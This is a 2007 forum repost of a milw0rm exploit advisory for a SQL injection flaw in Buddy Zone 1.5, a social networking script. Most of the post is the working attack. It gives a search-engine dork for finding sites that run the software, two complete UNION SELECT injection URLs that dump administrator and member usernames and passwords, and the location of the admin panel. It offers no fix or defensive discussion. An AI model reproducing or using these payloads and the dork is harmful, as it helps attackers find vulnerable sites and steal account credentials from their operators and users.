kw3rln Posted June 30, 2007 Report Posted June 30, 2007 --==+================================================================================+==----==+ Buddy Zone Version 1.5 SQL Injection Vulnerability +==----==+================================================================================+==--AUTHOR: t0pP8uZz & xprogSITE: http://www.vastal.com/buddy-zone-social-networking-script.htmlDORK: allintext:"Powered By Buddy Zone"DESCRIPTION: Remote sql injection in view_sub_cat.php cat_id, able to pull username/passwords of their admin and user accounts.EXPLOITS:http://www.site.com/view_sub_cat.php?cat_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(0x3C2F74643E,admin_user,0x3a,admin_password,0x3C62723E),4/**/FROM/**/admin_users/*http://www.site.com/view_sub_cat.php?cat_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(0x3C2F74643E,member_email,0x3a,member_password,0x3C62723E),4/**/FROM/**/members/*Tip/Note:The Administrator's Panel is in /admin/.GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net, and the ASFC/FM4 peeps !--==+================================================================================+==----==+ Buddy Zone Version 1.5 SQL Injection Vulnerability +==----==+================================================================================+==--# milw0rm.com [2007-06-29] Quote